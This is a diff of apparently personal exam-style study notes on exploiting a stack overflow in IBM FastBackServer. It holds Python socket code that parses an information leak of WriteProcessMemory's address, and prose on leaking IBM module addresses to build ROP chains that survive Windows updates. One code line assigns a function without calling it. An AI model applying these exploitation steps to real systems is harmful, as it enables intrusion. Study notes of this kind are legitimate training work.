BGuerrero825/Cyber-Notes/Offensive Security/Stack Overflows and ASLR Bypass.md

 	1. `response_address = parse_response(response) // print(str(hex(response_address)))`

 ```
+	...
+    response = s.recv(1024)
+    print(response)
+    address = parse_response
+    if address:
+        address = hex(int(parse_response(response),16))
+        print(address)

+    s.close()
+    sys.exit(0)

 def parse_response(response):
     pattern = b"Address is: "
     offset = response.find(pattern)
     if offset != -1:
-        addr_start = offset + len(pattern) + 2
+        addr_start = offset + len(pattern)
-        response = response[addr_start:addr_start+8]
+        response = response[addr_start:addr_start+10]
         return response
+    print("Invalid response received")
-    return "Invalid input received"
+    return 0
 ```

 ---
 # Expanding the Exploit (ASLR Bypass)

-Previously we were able to retrieve an address to `WriteProcessMemory` which also gave a pointer to `kernel32.dll`.
+By retrieving the address of `WriteProcessMemory` the program also revealed information about the location of `kernel32.dll`.
 However, every monthly Windows update will change the offsets of symbols within this module, breaking any ROP gadgets used by the exploit.
 To make this exploit more resilient, we can leak the baked in IBM modules instead and build ROP gadgets from those, meaning that the exploit will only be dependent on the version of FastBackServer (vs the version of Windows)

 ### Leaking an IBM Module
 List loaded IBM modules and their locations.
 From there select a suitable module to pass to the information leak vulnerability to determine its runtime address and start building the ROP chain.